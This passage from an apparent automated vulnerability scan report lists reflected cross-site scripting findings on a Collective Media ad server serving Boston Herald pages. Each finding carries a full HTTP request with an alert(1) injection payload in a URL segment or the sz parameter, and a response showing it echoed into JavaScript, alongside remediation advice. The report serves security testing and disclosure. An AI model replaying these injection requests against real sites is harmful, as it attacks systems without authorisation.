Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;env=ifr;ord1=40053;cmpgurl=http%253A//bostonherald.com/includes/processAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8338
Date: Sat, 17 Sep 2011 01:49:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30420328179_1316224147","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5&size=728x90&imp_id=cm-30420328179_1316224147,12298b058f07061&referrer=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldint
...[SNIP]...
|
4.23. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/cm.rev_bostonherald/ |
Issue detail
The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a58b8(a)cb7eca68845 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.rev_bostonherald/;sz=a58b8(a)cb7eca68845 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8090
Date: Sat, 17 Sep 2011 01:48:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:a58b8(a)cb7eca68845,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...
|
4.24. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d0f'-alert(1)-'238029b5c84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7400
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30221086088_1316222009","http://ad.doubleclick.net/adj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30221086088_1316222009,12298b058f07061,polit,;;cmw=owl;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER
...[SNIP]...
|
4.25. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8c69'-alert(1)-'5b29faf592d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:33 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30501481718_1316222013","http://ad.doubleclick.net/adj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;net=iblocal;u=,iblocal-30501481718_1316222013,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt>
...[SNIP]...
|
4.26. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60a13'-alert(1)-'30c480b6c14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:37 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30201561711_1316222017","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;net=iblocal;u=,iblocal-30201561711_1316222017,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt>
...[SNIP]...
|
4.27. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 743e9'-alert(1)-'e734a6f0a30 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience;sz=743e9'-alert(1)-'e734a6f0a30 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:20 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7353
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
iveMedia.createAndAttachAd("iblocal-30322160699_1316222000","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30322160699_1316222000,12298b058f07061,none,;;sz=743e9'-alert(1)-'e734a6f0a30;contx=none;dc=s;btg=?","743e9'-alert(1)-'e734a6f0a30","",true);</scr'+'ipt>
...[SNIP]...
|
4.28. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80447'-alert(1)-'f91ca21afff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:51 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219867092_1316221791","http://ad.doubleclick.net/adj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;net=q1;u=,q1-30219867092_1316221791,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...
|
4.29. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87eb6'-alert(1)-'9d423e3fbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7357
Date: Sat, 17 Sep 2011 01:09:52 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419616533_1316221792","http://ad.doubleclick.net/adj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;net=q1;u=,q1-30419616533_1316221792,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...
|
4.30. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7479'-alert(1)-'d7ae9e9aabb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30503457423_1316221793","http://ad.doubleclick.net/adj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;net=q1;u=,q1-30503457423_1316221793,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...
|
4.31. http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/be_news |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7744'-alert(1)-'53b38ddfa3a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/be_news;sz=a7744'-alert(1)-'53b38ddfa3a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7330
Date: Sat, 17 Sep 2011 01:09:49 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
ge="Javascript">CollectiveMedia.createAndAttachAd("q1-30207990841_1316221788","http://ad.doubleclick.net/adj/q1.bosherald/be_news;net=q1;u=,q1-30207990841_1316221788,12298b058f07061,none,;;cmw=nurl;sz=a7744'-alert(1)-'53b38ddfa3a;contx=none;dc=s;btg=?","a7744'-alert(1)-'53b38ddfa3a","",true);</scr'+'ipt>
...[SNIP]...
|
4.32. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d09a'-alert(1)-'33f55d64be5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:15 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30105513189_1316222415","http://ad.doubleclick.net/adj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;net=q1;u=,q1-30105513189_1316222415,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...
|
4.33. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fae6'-alert(1)-'317c5c0c938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:19 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
